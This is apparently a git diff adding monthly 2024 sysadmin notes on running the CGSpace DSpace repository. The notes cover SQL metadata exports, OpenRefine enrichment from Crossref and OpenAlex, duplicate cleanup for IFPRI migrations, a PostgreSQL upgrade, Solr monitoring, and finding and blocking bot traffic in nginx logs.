$ zstdgrep -a 'URI Too Long' log/dspace.log-2024-04-* | wc -l
1423
```
- Spend some time looking at duplicate DOIs again...
## 2024-05-08
- Spend some time looking at duplicate DOIs again...
- I finally finished looking at the duplicate DOIs for journal articles
- I updated the list of handle redirects and there are 386 of them!
## 2024-05-09
- Spend some time working on the IFPRI 20202021 batch
- I started by checking for exact duplicates (1.0 similarity) using DOI, type, and issue date
## 2024-05-12
- I couldn't figure out how to do a complex join on withdrawn items along with their metadata, so I pull out a few like titles, handles, and provenance separately:
```psql
dspace=# \COPY (SELECT i.uuid, m.text_value AS uri FROM item i JOIN metadatavalue m ON i.uuid = m.dspace_object_id WHERE withdrawn AND m.metadata_field_id=25) TO /tmp/withdrawn-handles.csv CSV HEADER;
dspace=# \COPY (SELECT i.uuid, m.text_value AS title FROM item i JOIN metadatavalue m ON i.uuid = m.dspace_object_id WHERE withdrawn AND m.metadata_field_id=64) TO /tmp/withdrawn-titles.csv CSV HEADER;
dspace=# \COPY (SELECT i.uuid, m.text_value AS submitted_by FROM item i JOIN metadatavalue m ON i.uuid = m.dspace_object_id WHERE withdrawn AND m.metadata_field_id=28 AND m.text_value LIKE 'Submitted by%') TO /tmp/withdrawn-submitted-by.csv CSV HEADER;
```
- Then joined them:
```console
$ csvjoin -c uuid /tmp/withdrawn-title.csv /tmp/withdrawn-handles.csv /tmp/withdrawn-submitted-by.csv > /tmp/withdrawn.csv
```
- This gives me an insight into who submitted at 334 of the duplicates over the past few years...
- I fixed a few hundred titles with leading/trailing whitespace, newlines, and ligatures like ff, fi, fl, ffi, and ffl
## 2024-05-13
- Export a list of IFPRI information products with handle links and CONTENTdm links:
```
$ csvgrep -c 'dc.description.provenance[en_US]' -m 'CONTENTdm' cgspace.csv \
| csvcut -c 'id,dc.description.provenance[en_US],dc.identifier.uri[en_US]' \
| tee /tmp/ifpri-redirects.csv \
| csvstat --count
2645
```
- I discovered the `/server/api/pid/find` endpoint today, which is much more direct and manageable than the `/server/api/discover/search/objects?query=` endpoint when trying to get metadata for a Handle (item, collection, or community)
- The "pid" stands for permanent identifiers apparently, and we can use it like this:
```
https://dspace7test.ilri.org/server/api/pid/find?id=10568/118424
```
## 2024-05-15
- I got journal titles for 2,900 journal articles that were missing them from Crossref
## 2024-05-16
Helping IFPRI with some DSpace 7 API support, these are two queries for items issued in 2024:
- https://dspace7test.ilri.org/server/api/discover/search/objects?query=dcterms.issued:2024
- https://dspace7test.ilri.org/server/api/discover/search/objects?query=dcterms.issued_dt%3A%5B2024-01-01T00%3A00%3A00Z%20TO%20%2A%5D — note the Lucene search syntax is URL encoded version of `:[2024-01-01T00:00:00Z TO *]`
Both of them return the same number of results and seem identitical as far as I can see, but the second one uses Solr date indexes and requires the full Lucene datetime and range syntax
I wrote a new version of the `check_duplicates.py` script to help identify duplicates with different types
- Initially I called it `check_duplicates_fast.py` but it's actually not faster
- I need to find a way to deal with duplicates from IFPRI's repository because there are some mismatched types...
## 2024-05-20
Continue working through alternative duplicate matching for IFPRI
- Their item types are sometimes different than ours...
- One thing I think I can say for sure is that the default similarity factor in my script is 0.6, and I rarely see legitimate duplicates with such similarity so I might increase this to 0.7 to reduce the number of items I have to check
- Also, the difference in issue dates is currently 365, but I should reduce that a bit, perhaps to 270 days (9 months)
## 2024-05-22
- Finalize and upload the IFPRI 20202021 batch set
- I used a new technique to get missing licenses via Crossref (it's Python 2 because of OpenRefine's Jython):
```python
import urllib2
doi = cells['cg.identifier.doi[en_US]'].value
url = "https://api.crossref.org/works/" + doi
useragent = "Python (mailto:a.o@cgiar.org)"
request = urllib2.Request(url.encode("utf-8"), headers={"User-Agent" : useragent})
get = urllib2.urlopen(request)
return get.read().decode('utf-8')
```
## 2024-05-23
- Finalize last of the duplicates I found for the IFPRI 20202021 batch set (those that we missed initially due to mismatched types)
- Export a new list of IFPRI redirects from CONTENTdm:
```console
$ csvgrep -c 'dc.description.provenance[en_US]' -r 'Original URLs? from IFPRI CONTENTdm' cgspace.csv \
| csvcut -c 'id,dc.description.provenance[en_US],dc.identifier.uri[en_US]' \
| tee /tmp/ifpri-redirects.csv \
| csvstat --count
4004
```
I found a way to get abstracts from PLOS
- They offer an API that returns XML including the JATS-formatted abstracts
- I created a new column in OpenRefine by fetching specially crafted URLs based on the DOIs using this GREL:
```console
"https://journals.plos.org/plosone/article/file?id=" + cells['doi'].value + '&type=manuscript'
```
Then used `value.parseXml()` on the resulting text to extract the abstract's text:
```console
value.parseXml().select("abstract")[0].xmlText()
```
This doesn't preserve `<p>` tags though...
- Oh, nice, this does!
```console
forEach(value.parseHtml().select("abstract p"), i, i.htmlText()).join("\r\n\r\n")
```
For each paragraph inside an abstract, get the inner text and join them as one string separated by two newlines...
- Ah, some articles have multiple abstracts, for example: https://journals.plos.org/plosone/article/file?id=https://doi.org/10.1371/journal.pntd.0001859&type=manuscript
- I need to select the abstract that does **not** have any attributes (using [Jsoup selector syntax](https://jsoup.org/apidocs/org/jsoup/select/Selector.html))
```console
forEach(value.parseXml().select("abstract:not([*]) p"), i, i.xmlText()).join("\r\n\r\n")
```
Testing `xsv` (Rust) versus `csvkit` (Python) to filter all items with DOIs from a DSpace dump with 118,000 items:
```console
$ time xsv search -s doi 'doi\.org' /tmp/cgspace-minimal.csv | xsv select doi | xsv count
27339
xsv search -s doi 'doi\.org' /tmp/cgspace-minimal.csv 0.06s user 0.03s system 98% cpu 0.091 total
xsv select doi 0.02s user 0.02s system 40% cpu 0.091 total
xsv count 0.01s user 0.00s system 9% cpu 0.090 total
$ time csvgrep -c doi -m 'doi.org' /tmp/cgspace-minimal.csv | csvcut -c doi | csvstat --count
27339
csvgrep -c doi -m 'doi.org' /tmp/cgspace-minimal.csv 1.15s user 0.06s system 95% cpu 1.273 total
csvcut -c doi 0.42s user 0.05s system 36% cpu 1.283 total
csvstat --count 0.20s user 0.03s system 18% cpu 1.298 total
```
## 2024-05-27
- Working on IFPRI datasets batch migration
- 732 items total
- 6 duplicates on CGSpace
- 6 duplicates within set that need investigation
## 2024-05-28
- I'm thinking of increasing the frequency of thumbnail generation on CGSpace
- Currently the `dspace filter-media` script runs once at 3AM for all media types and seems to take ~10 minutes to run for all 118,000 items...
- I think I will make the thumbnailer run explicitly more often using `-p "ImageMagick PDF Thumbnail"`
<!-- vim: set sw=2 ts=2: -->

119
content/posts/2024-06.md Normal file
View File

@ -0,0 +1,119 @@
---
title: "June, 2024"
date: 2024-06-03T14:14:00+03:00
author: "Alan Orth"
categories: ["Notes"]
---
## 2024-06-03
- Working on IFPRI datasets
- I noticed the licenses were missing from Nilam's original file so I found a way to check [Dataverse's API for a persistent identifier](https://guides.dataverse.org/en/latest/api/native-api.html#export-metadata-of-a-dataset-in-various-formats)
- We have both Handles and DOIs for these datasets, both from Harvard's Dataverse
<!--more-->
- I used this GREL in OpenRefine to create a new column based on URLs using the DOI (uppercasing the DOI for Dataverse):
```
"https://dataverse.harvard.edu/api/datasets/export?exporter=dataverse_json&persistentId=doi:" + value.split('https://doi.org/')[-1].toUppercase()
```
- Then I was able to extract the license text from the JSON response using:
```
value.parseJson()['datasetVersion']['termsOfUse']
```
- Similar for the Handle...
## 2024-06-04
- Some Dataverse entries have the license in `['datasetVersion']['license']` instead...
- I finalized cleaning the 722 IFPRI datasets and uploaded them to CGSpace
## 2024-06-14
- Minor cleanups on IFPRI's 20162019 batch migration file
- I will start with duplicates on unique identifiers like DOIs
## 2026-06-18
- Merge and upload metadata for duplicates in IFPRI's 20162019 set:
- 144 exact match on CGSpace via DOI, type, and date
- 32 with CGSpace handles
- I also spent some time converting the `ilri/post_bitstreams.py` script to use the DSpace 7 REST API via dspace-rest-client
- There are 28 PDFs specified for these 176 duplicates, and a handful of them do not already exist on CGSpace so I will upload them
## 2024-06-19
- Spent some time checking the remaining 3312 IFPRI 20162019 migration set for duplicates on CGSpace
- There seem to be about 50 exact matches of title, type, and issue date
## 2024-06-20
- Finalize merging and uploading metadata for 48 duplicates from the IFPRI 20162019 migration set
- Heavy load on both CGSpace and DSpace 7 Test this afternoon
- Took me a while to figure out it was due to someone / something hammering `/search` for a bunch of facets
- The `pm2 logs` command was more useful than the nginx logs to see the requests at least, for example:
```
0|dspace-ui | GET /search?f.sdg=SDG%2013%20-%20Climate%20action,equals&spc.page=1&f.accessRights=Open%20Access,equals&f.dateIssued.min=2023&f.dateIssued.max=2024&f.country=Colombia,equals&f.subject=climate%20change,equals&f.region=Latin%20America%20and%20the%20Caribbean,equals&f.publisher=CGIAR%20FOCUS%20Climate%20Security,equals - - ms - -
1|dspace-ui | GET /search?f.accessRights=Open%20Access,equals&spc.page=1&f.sponsorship=CGIAR%20Trust%20Fund,equals&f.impactArea=Climate%20adaptation%20and%20mitigation,equals&f.region=Eastern%20Africa,equals&f.publisher=International%20Institute%20of%20Tropical%20Agriculture,equals - - ms - -
3|dspace-ui | GET /search?f.sdg=SDG%2013%20-%20Climate%20action,equals&f.sdg=SDG%2012%20-%20Responsible%20consumption%20and%20production,equals&spc.page=1&f.affiliation=CGIAR%20Research%20Program%20on%20Climate%20Change,%20Agriculture%20and%20Food%20Security,equals&f.affiliation=Alliance%20of%20Bioversity%20International%20and%20CIAT,equals&f.dateIssued.min=2020&f.dateIssued.max=2021&f.impactArea=Environmental%20health%20and%20biodiversity,equals - - ms - -
```
- Still difficult to find the client, because the logs are all [coming from Angular's user agent](https://github.com/DSpace/dspace-angular/issues/2902) and IP
- I changed the nginx logging to use the `X-Forwarded-For` header, as the default `combined` log format uses `$remote_addr` by default, which is only accurate if the request doesn't come from Angular (ie directly to the API)
- From what I can see now the IPs are all coming from Huawei Cloud and Tencent
- The ASNs are AS136907 (Huawei) and AS132203 (Tencent)
- For now I will just add those to the list of bot networks
## 2024-06-21
- Update the nginx logging to use [nginx's `real_ip` module](http://nginx.org/en/docs/http/ngx_http_realip_module.html) to log the correct client IP
- I think this means we will start sending 'bot' to the Angular / Express frontend because bot IPs will be properly classified now...
- I will have to re-work or at least re-think that nginx configuration for requests going to the frontend because the proposed fix in https://github.com/DSpace/dspace-angular/issues/2902 is to pass on the client's user-agent
- Then I updated the list of bot networks:
```console
$ wget https://asn.ipinfo.app/api/text/list/AS12876 \
https://asn.ipinfo.app/api/text/list/AS132203 \
https://asn.ipinfo.app/api/text/list/AS13238 \
https://asn.ipinfo.app/api/text/list/AS136907 \
https://asn.ipinfo.app/api/text/list/AS14061 \
https://asn.ipinfo.app/api/text/list/AS14618 \
https://asn.ipinfo.app/api/text/list/AS16276 \
https://asn.ipinfo.app/api/text/list/AS16509 \
https://asn.ipinfo.app/api/text/list/AS203020 \
https://asn.ipinfo.app/api/text/list/AS204287 \
https://asn.ipinfo.app/api/text/list/AS21859 \
https://asn.ipinfo.app/api/text/list/AS23576 \
https://asn.ipinfo.app/api/text/list/AS24940 \
https://asn.ipinfo.app/api/text/list/AS396982 \
https://asn.ipinfo.app/api/text/list/AS45102 \
https://asn.ipinfo.app/api/text/list/AS50245 \
https://asn.ipinfo.app/api/text/list/AS55286 \
https://asn.ipinfo.app/api/text/list/AS6939 \
https://asn.ipinfo.app/api/text/list/AS8075
$ cat AS* | ~/go/bin/mapcidr -a > /tmp/networks.txt
$ wc -l /tmp/networks.txt
8675 /tmp/networks.txt
```
- Update list of ORCID identifiers with new ones from Alliance and IFPRI
- Finalize uploading the remaining 3,264 items from IFPRI's 20162019 batch migration to CGSpace
## 2024-06-24
- Minor updates to [csv-metadata-quality](https://github.com/ilri/csv-metadata-quality) and [cgspace-java-helpers](https://github.com/ilri/cgspace-java-helpers) to normalize a few more invalid DOI formats
## 2024-06-25
- Work on uploading some missing PDFs from the IFPRI 20162019 batch migration
## 2024-06-26
- Did a big cleanup of several thousand journal articles based on metadata from Crossref
<!-- vim: set sw=2 ts=2: -->

57
content/posts/2024-07.md Normal file
View File

@ -0,0 +1,57 @@
---
title: "July, 2024"
date: 2024-07-01T09:37:00+03:00
author: "Alan Orth"
categories: ["Notes"]
---
## 2024-07-01
- A bit of work to clean up duplicate DOIs on CGSpace
- A handful of book chapters, working papers, and journal articles using the wrong DOI
- I tried to delete all users who have been inactive since six years ago (July 1, 2018):
<!--more-->
```console
$ dspace dsrun org.dspace.eperson.Groomer -a -b 07/01/2018 -d
```
- File an issue on DSpace GitHub: [Allow configuring disallowed domains for self registration](https://github.com/DSpace/DSpace/issues/9675)
## 2024-07-11
- Minor fixes to normalize the IFPRI CONTENTdm URLs in provenance fields:
```console
dspace=# BEGIN;
BEGIN
dspace=*# UPDATE metadatavalue SET text_value = replace(text_value, 'cdm/ref', 'digital') WHERE text_value LIKE '%CONTENTdm%cdm/ref/%';
UPDATE 1876
dspace=*# UPDATE metadatavalue SET text_value = replace(text_value, 'CONTENTdm: ', 'CONTENTdm: ') WHERE text_value LIKE '%CONTENTdm: %';
UPDATE 21
dspace=*# COMMIT;
COMMIT
```
- Then export a new list of CONTENTdm redirects, excluding withdrawn items:
```console
dspace= ☘ \COPY (SELECT m.text_value, h.handle FROM metadatavalue m JOIN handle h on m.dspace_object_id = h.resource_id WHERE m.metadata_field_id=28 AND m.text_value LIKE '%URL from IFPRI CONTENTdm%' AND h.resource_type_id=2 AND m.dspace_object_id IN (SELECT uuid FROM item WHERE in_archive AND NOT withdrawn)) to /tmp/ifpri.csv CSV HEADER;
COPY 8568
```
- Similarly, get a list of withdrawn item redirects:
```console
dspace= ☘ \COPY (SELECT m.text_value AS handle_from, h.handle AS handle_to FROM metadatavalue m JOIN handle h on m.dspace_object_id = h.resource_id WHERE m.metadata_field_id=181 AND h.resource_type_id=2 AND h.resource_id IN (SELECT uuid FROM item WHERE in_archive AND NOT withdrawn)) to /tmp/handle-redirects.csv CSV HEADER;
COPY 396
```
## 2024-07-18
- I experimented with adding a regular expression to validate DOIs to the submission form
- It is a slightly modified version of the one found here: https://stackoverflow.com/questions/27910/finding-a-doi-in-a-document-or-page
- I decided it will probably be confusing to people and will have limited benefit, since we are normalizing most forms of DOIs to our preferred form after submission anyway
<!-- vim: set sw=2 ts=2: -->

71
content/posts/2024-08.md Normal file
View File

@ -0,0 +1,71 @@
---
title: "August, 2024"
date: 2024-08-08T23:07:00-07:00
author: "Alan Orth"
categories: ["Notes"]
---
## 2024-08-08
- While working on the CGIAR Climate Change Synthesis I learned some new tricks with OpenRefine
<!--more-->
- The first was to retrieve affiliations from OpenAlex and extract them from JSON with this GREL:
```
forEach(
value.parseJson()['authorships'],
a,
forEach(
a.parseJson()['institutions'],
i,
i['display_name']
).join("||")
).join("||")
```
- It is a nested `forEach` to extract all institutions for all authors
- Second was a better way to deduplicate lists in Jython while preserving list order:
```python
# better dedupe preserves order
seen = set()
deduped_list = [x for x in value.split("||") if x not in seen and not seen.add(x)]
return "||".join(deduped_list)
```
## 2024-08-20
- Delete duplicate metadata values using the method I described in this GitHub issue: https://github.com/DSpace/DSpace/issues/8253#issuecomment-1331756418
## 2024-08-22
- Help IWMI with some OpenSearch RSS/Atom feeds for search results:
- https://cgspace.cgiar.org/server/opensearch/search?query=affiliation:"International Water Management Institute" AND initiative:"Climate Resilience" AND subject:flooding
- https://cgspace.cgiar.org/server/opensearch/search?query=affiliation:"International Water Management Institute" AND initiative:"Climate Resilience" AND subject:drought
- https://cgspace.cgiar.org/server/opensearch/search?query=affiliation:"International Water Management Institute" AND initiative:"Climate Resilience" AND subject:landslides
- Export list of withdrawn handle redirects:
```
dspace=# \COPY (SELECT m.text_value AS handle_from, h.handle AS handle_to FROM metadatavalue m JOIN handle h on m.dspace_object_id = h.resource_id WHERE m.metadata_field_id=181 AND h.resource_type_id=2 AND h.resource_id IN (SELECT uuid FROM item WHERE in_archive AND NOT withdrawn)) to /tmp/handle-redirects.csv CSV HEADER;
COPY 400
```
- Export list of IFPRI CONTENTdm redirects:
```
dspace-# \COPY (SELECT m.text_value, h.handle FROM metadatavalue m JOIN handle h on m.dspace_object_id = h.resource_id WHERE m.metadata_field_id=28 AND m.text_value LIKE '%URL from IFPRI CONTENTdm%' AND h.resource_type_id=2 AND m.dspace_object_id IN (SELECT uuid FROM item WHERE in_archive AND NOT withdrawn)) to /tmp/ifpri.csv CSV HEADER;
COPY 10794
```
- I filed [an issue](https://github.com/DSpace/dspace-angular/issues/3258) on DSpace Angular for anonymous users to be able to export search results to CSV
## 2024-08-26
- Spent some time trying to rebase our DSpace Angular themes on top of the massive header/navbar rework from [DSpace 7.6.2](https://github.com/DSpace/dspace-angular/pull/2858)
- Spent some time getting missing bibliographic metadata (issue dates, licenses, pages, volume, issue, publisher, etc) from Crossref for CGSpace
<!-- vim: set sw=2 ts=2: -->

147
content/posts/2024-09.md Normal file
View File

@ -0,0 +1,147 @@
---
title: "September, 2024"
date: 2024-09-01T21:16:00-07:00
author: "Alan Orth"
categories: ["Notes"]
---
## 2024-09-01
- Upgrade CGSpace to DSpace 7.6.2
<!--more-->
## 2024-09-05
- Finalize work on migrating DSpace Angular from Yarn to NPM
## 2024-09-06
- This morning Tomcat crashed due to an OOM kill:
```
Sep 06 00:00:24 server systemd[1]: tomcat9.service: A process of this unit has been killed by the OOM killer.
Sep 06 00:00:25 server systemd[1]: tomcat9.service: Main process exited, code=killed, status=9/KILL
Sep 06 00:00:25 server systemd[1]: tomcat9.service: Failed with result 'oom-kill'.
```
- According to the system journal, it was a Node.js dspace-angular process that tried to allocate memory and failed, thus invoking the OOM killer
- Currently I see high memory usage in those processes:
```console
$ pm2 status
┌────┬──────────────┬─────────────┬─────────┬─────────┬──────────┬────────┬──────┬───────────┬──────────┬──────────┬──────────┬──────────┐
│ id │ name │ namespace │ version │ mode │ pid │ uptime │ ↺ │ status │ cpu │ mem │ user │ watching │
├────┼──────────────┼─────────────┼─────────┼─────────┼──────────┼────────┼──────┼───────────┼──────────┼──────────┼──────────┼──────────┤
│ 0 │ dspace-ui │ default │ 7.6.3-… │ cluster │ 994 │ 4D │ 0 │ online │ 0% │ 3.4gb │ dspace │ disabled │
│ 1 │ dspace-ui │ default │ 7.6.3-… │ cluster │ 1015 │ 4D │ 0 │ online │ 0% │ 3.4gb │ dspace │ disabled │
│ 2 │ dspace-ui │ default │ 7.6.3-… │ cluster │ 1029 │ 4D │ 0 │ online │ 0% │ 3.4gb │ dspace │ disabled │
│ 3 │ dspace-ui │ default │ 7.6.3-… │ cluster │ 1042 │ 4D │ 0 │ online │ 0% │ 3.4gb │ dspace │ disabled │
└────┴──────────────┴─────────────┴─────────┴─────────┴──────────┴────────┴──────┴───────────┴──────────┴──────────┴──────────┴──────────┘
```
- I bet if I look in the logs I'd find some kind of heavy traffic on the frontend, causing high caching for Angular SSR
## 2024-09-08
- Analyzing memory use in our DSpace hosts, which have 32GB of memory
- Effective cache of PostgreSQL is estimated at 11GB, which seems way high since the database is only 2GB
- Realistically this should be how we adjust, with PostgreSQL using ~8GB (or less) and each dspace-angular process pinned at 2GB...
> Total - Solr - Tomcat Postgres - Nginx - Angular
> 31366 (1024×4.4) 7168 (8×1024) 512 - (4x2048) = 2796.4 left...
- I put some of these changes in on DSpace Test and will monitor this week
## 2024-09-10
- Some bot in South Africa made a ton of requests on the API and made the load hit the roof:
```
# grep -E '10/Sep/2024:[10-11]' /var/log/nginx/api-access.log | awk '{print $1}' | sort | uniq -c | sort -h
...
149720 102.182.38.90
```
- They are using several user agents so are obviously a bot:
```
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Mozilla/5.0 (Windows; U; Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0
```
- I added them to the list of bot networks in nginx and the load went down
## 2024-09-11
- Upgrade DSpace 7 Test to Ubuntu 24.04
- I did some minor maintenance to test dspace-statistics-api with Python 3.12
- I tagged version 1.4.4 and released it on GitHub
## 2024-09-14
- Noticed a persistent higher than usual load on CGSpace and checked the server logs
- Found some new data center subnets to block because they were making thousands of requests with normal user agents
- I enabled HTTP/3 in nginx
- I enabled the SSR patch in Angular: https://github.com/DSpace/dspace-angular/issues/3110
## 2024-09-16
- Experiment with the <a href="https://github.com/codeobia/dspace-statistics-api-js">dspace-statistics-api-js</a> on DSpace 7 Test
- In the past it always caused Solr to run out of memory, but I increased Solr's heap from 2g to 3g and it runs without crashing
- I attached VisualVM to Solr with a 3g and 4g heap and iterated over 1260 pages of results in the dspace-statistics-api-js:
![Solr with 3g heap](/cgspace-notes/2024/09/2024-09-16-Solr-3g-heap.png)
![Solr with 4g heap](/cgspace-notes/2024/09/2024-09-16-Solr-4g-heap.png)
## 2024-09-23
- Upgrade PostgreSQL from version 14 to 15 on DSpace Test the same way I did last year:
```console
# apt update
# apt install postgresql-15
# Update configs with Ansible
# systemctl stop tomcat9
# pg_ctlcluster 14 main stop
# tar -cvzpf var-lib-postgresql-14.tar.gz /var/lib/postgresql/14
# tar -cvzpf etc-postgresql-14.tar.gz /etc/postgresql/14
# pg_ctlcluster 15 main stop
# pg_dropcluster 15 main
# pg_upgradecluster 14 main
# pg_ctlcluster 15 main start
...
ERROR: could not find function "xml_is_well_formed" in file "/usr/lib/postgresql/15/lib/pgxml.so"
ERROR: function public.xml_is_well_formed(text) does not exist
ERROR: could not find function "xml_is_well_formed" in file "/usr/lib/postgresql/15/lib/pgxml.so"
ERROR: function public.xml_valid(text) does not exist
```
- After that I [re-indexed the database indexes](https://adamj.eu/tech/2021/04/13/reindexing-all-tables-after-upgrading-to-postgresql-13/) using a query:
```console
$ su - postgres
$ cat /tmp/generate-reindex.sql
SELECT 'REINDEX TABLE CONCURRENTLY ' || quote_ident(relname) || ' /*' || pg_size_pretty(pg_total_relation_size(C.oid)) || '*/;'
FROM pg_class C
LEFT JOIN pg_namespace N ON (N.oid = C.relnamespace)
WHERE nspname = 'public'
AND C.relkind = 'r'
AND nspname !~ '^pg_toast'
ORDER BY pg_total_relation_size(C.oid) ASC;
$ psql dspace < /tmp/generate-reindex.sql > /tmp/reindex.sql
$ <trim the extra stuff from /tmp/reindex.sql>
$ psql dspace < /tmp/reindex.sql
```
- The database shrunk by 186MB!
## 2024-09-29
- I upgraded the database on CGSpace to PostgreSQL 15
<!-- vim: set sw=2 ts=2: -->

82
content/posts/2024-10.md Normal file
View File

@ -0,0 +1,82 @@
---
title: "October, 2024"
date: 2024-10-03T11:01:00+03:00
author: "Alan Orth"
categories: ["Notes"]
---
## 2024-10-03
- I had an idea to get abstracts from OpenAlex
- For [copyright reasons they don't include plain abstracts](https://docs.openalex.org/api-entities/works/work-object#abstract_inverted_index), but the [pyalex](https://github.com/J535D165/pyalex) library can convert them on the fly
<!--more-->
- I filtered for journal articles that were Creative Commons and missing abstracts:
```console
$ csvcut -c 'id,dc.title[en_US],dcterms.abstract[en_US],cg.identifier.doi[en_US],dcterms.type[en_US],dcterms.language[en_US],dcterms.license[en_US]' ~/Downloads/2024-09-30-cgspace.csv | csvgrep -c 'dcterms.type[en_US]' -r '^Journal Article$' | csvgrep -c 'cg.identifier.doi[en_US]' -r '^.+$' | csvgrep -c 'dcterms.license[en_US]' -r '^CC-' | csvgrep -c 'dcterms.abstract[en_US]' -r '^$' | csvgrep -c 'dcterms.language[en_US]' -r '^en$' | grep -v "||" | grep -v -- '-ND' | grep -v -E 'https://doi.org/10.(2499|4160|17528)/' > /tmp/missing-abstracts.csv
```
- Then wrote a script to get them from OpenAlex
- After inspecting and cleaning a few dozen up in OpenRefine (removing "Keywords:" and copyright, and HTML entities, etc) I managed to get about 440
## 2024-10-06
- Since I increase Solr's heap from 2 to 3G a few weeks ago it seems like Solr is always using 100% CPU
- I don't understand this because it was running well before, and I only increased it in anticipation of running the dspace-statistics-api-js, though never got around to it
- I just realized that this may be related to the JMX monitoring, as I've seen gaps in the Grafana dashboards and remember that it took surprisingly long to scrape the metrics
- Maybe I need to change the scrape interval
## 2024-10-08
- I checked the VictoriaMetrics vmagent dashboard and saw that there were thousands of errors scraping the `jvm_solr` target from Solr
- So it seems like I do need to change the scrape interval
- I will increase it from 15s (global) to 20s for that job
- Reading some documentation I found [this reference from Brian Brazil that discusses this very problem](https://www.robustperception.io/keep-it-simple-scrape_interval-id/)
- He recommends keeping a single scrape interval for all targets, but also checking the slow exporter (`jmx_exporter` in this case) and seeing if we can limit the data we scrape
- To keep things simple for now I will increase the global scrape interval to 20s
- Long term I should limit the metrics...
- Oh wow, I found out that [Solr ships with a Prometheus exporter!](https://solr.apache.org/guide/8_11/monitoring-solr-with-prometheus-and-grafana.html) and even includes a Grafana dashboard
- I'm trying to run the Solr prometheus-exporter as a one-off systemd unit to test it:
```console
# cd /opt/solr-8.11.3/contrib/prometheus-exporter
# systemd-run --uid=victoriametrics --gid=victoriametrics --working-directory=/opt/solr-8.11.3/contrib/prometheus-exporter ./bin/solr-exporter -p 9854 -b http://localhost:8983/solr -f ./conf/solr-exporter-config.xml -s 20
```
- The default scrape interval is 60 seconds, so if we scrape it more than that the metrics will be stale
- From what I've seen this returns in less than one second so it should be safe to reduce the scrape interval
## 2024-10-19
- Heavy load on CGSpace today
- There is a noted increase just before 4PM local time
- I extracted a list of IPs:
```console
# grep -E '19/Oct/2024:1[567]' /var/log/nginx/api-access.log | awk '{print $1}' | sort -u > /tmp/ips.txt
```
- I looked them up and found some data center IPs that were using normal user agents with hundreds of IPs, for example:
- 154.47.29.168 # 212238 (CDNEXT - Datacamp Limited, GB)
- 91.210.64.12 # 29802 (HVC-AS, US) - HIVELOCITY, Inc.
- 103.221.57.120 # 132817 (DZCRD-AS-AP DZCRD Networks Ltd, BD)
- 109.107.150.136 # 201341 (CENTURION-INTERNET-SERVICES - trafficforce, UAB, LT) - Code200
- 185.210.207.1 # 209709 (CODE200-ISP1 - UAB code200, LT)
- 185.162.119.101 # 207223 (GLOBALCON - Global Connections Network LLC, US)
- 173.244.35.101 # 64286 (LOGICWEB, US) - Tesonet
- 139.28.160.141 # 396319 (US-INTERNET-396319, US) - OxyLabs
- 104.143.89.112 # 62874 (WEB2OBJECTS, US) - Web2Objects LLC
- I added some network blocks to the nginx conf
- Interestingly, I see so many IPs using the same user agent today:
```console
# grep "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.3" /var/log/nginx/api-access.log | awk '{print $1}' | sort -u | wc -l
767
```
- For reference, the current Chrome version is 129 or so...
- This is definitely worth looking into because it seems like one massive botnet
<!-- vim: set sw=2 ts=2: -->

50
content/posts/2024-11.md Normal file
View File

@ -0,0 +1,50 @@
---
title: "November, 2024"
date: 2024-11-11T09:47:00+03:00
author: "Alan Orth"
categories: ["Notes"]
---
## 2024-11-11
- Some IP in India is making tons of requests this morning with a normal user agent:
```console
# awk '{print $1}' /var/log/nginx/api-access.log | sort | uniq -c | sort -h | tail -n 40
...
513743 49.207.196.249
```
<!--more-->
- They are using this user agent:
```
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.3
```
## 2024-11-16
- I switched CGSpace to Node.js v20 since I've been using it in dev and test for months
## 2024-11-18
- I see a bot (188.34.177.10) on Hetzner has made 35,000 requests this morning and is pretending to be Googlebot, GoogleOther, etc
- Google publishes their range of IPs also: https://developers.google.com/search/docs/crawling-indexing/verifying-googlebot
- Our nginx config doesn't rate limit the API but perhaps that needs to change...
- In DSpace 4/5/6 the API was separate from the user interface so we didn't need to enforce rate limits there because we encouraged using that over scraping the UI
- In DSpace 7 the API is used by the frontend and perhaps should have the same IP- and UA-based rate limiting
## 2024-11-19
- I notice 10,000 requests by a new bot yesterday:
```
20.38.174.208 - - [18/Nov/2024:07:02:50 +0100] "GET /server/oai/request?verb=ListRecords&resumptionToken=oai_dc%2F2024-10-18T13%3A00%3A49Z%2F%2F%2F400 HTTP/1.1" 503 190 "-" "Laminas_Http_Client"
```
- Seems to be some kind of PHP framework library
- Yesterday one IP in Argentina made nearly 1,000,000 requests using a normal user agent: 181.4.143.40
- 188.34.177.10 ended up making 700,000 requests using various Googlebot, GoogleOther, and even normal Chrome user agents
<!-- vim: set sw=2 ts=2: -->

28
content/posts/2024-12.md Normal file
View File

@ -0,0 +1,28 @@
---
title: "December, 2024"
date: 2024-12-04T10:19:00+03:00
author: "Alan Orth"
categories: ["Notes"]
---
## 2024-12-04
- We need to get view and download statistics for the last year from CGSpace
- The only way to get that is using Solr
<!--more-->
- After consulting the [Solr documentation](https://solr.apache.org/guide/8_11/working-with-dates.html) I came up with this facet query:
> facet.range=time&facet.range.start=NOW/MONTH-11MONTHS&facet.range.end=NOW/MONTH+1MONTH&facet.range.gap=+1MONTH
- [This StackOverflow answer](https://stackoverflow.com/questions/34290600/how-to-apply-facet-on-date-field-where-result-should-provide-number-of-records-f) helped too, recommending `NOW/MONTH` to get neatly bucketed months because this will use the beginning of the current month
- For views, I added the following query parameters: `q=type:2&fq=-isBot:true AND statistics_type:view`
> http://localhost:8983/solr/statistics/select?facet.range.end=NOW%2FMONTH%2B1MONTH&facet.range.gap=%2B1MONTH&facet.range.start=NOW%2FMONTH-11MONTHS&facet.range=time&facet=true&fq=-isBot%3Atrue%20AND%20statistics_type%3Aview&indent=true&q.op=OR&q=type%3A2&rows=0
- For downloads I added the following query parameters: `q=type:0&fq=-isBot:true AND statistics_type:view AND bundleName:ORIGINAL`
